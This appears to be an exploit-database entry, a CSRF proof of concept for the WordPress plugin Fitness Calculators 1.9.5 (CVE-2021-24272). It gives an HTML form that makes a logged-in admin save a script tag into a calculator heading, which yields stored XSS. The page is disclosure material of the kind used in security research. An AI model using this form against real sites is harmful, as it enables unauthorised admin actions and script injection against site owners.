c18c22e3d9
8 changes to exploits/shellcodes Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC) Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) Budget and Expense Tracker System 1.0 - Arbitrary File Upload Police Crime Record Management Project 1.0 - Time Based SQLi
18 lines
No EOL
859 B
HTML
18 lines
No EOL
859 B
HTML
# Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
|
|
# Date: 2/28/2021
|
|
# Author: 0xB9
|
|
# Software Link: https://wordpress.org/plugins/fitness-calculators/
|
|
# Version: 1.9.5
|
|
# Tested on: Windows 10
|
|
# CVE: CVE-2021-24272
|
|
|
|
1. Description:
|
|
The plugin add calculators for Water intake, BMI calculator, protein Intake, and Body Fat and was lacking CSRF check, allowing attackers to make logged in users perform unwanted actions, such as change the calculator headers.
|
|
Due to the lack of sanitisation, this could also lead to a Stored Cross-Site Scripting issue
|
|
|
|
2. Proof of Concept:
|
|
|
|
<form method="post" action="https://example.com/wp-admin/admin.php?page=fcp_dashboard&tab=water">
|
|
<input type="text" value="<script>alert(1)</script>" name="fcw[fcw_heading]">
|
|
<input type="submit" value="Save" name="submit">
|
|
</form> |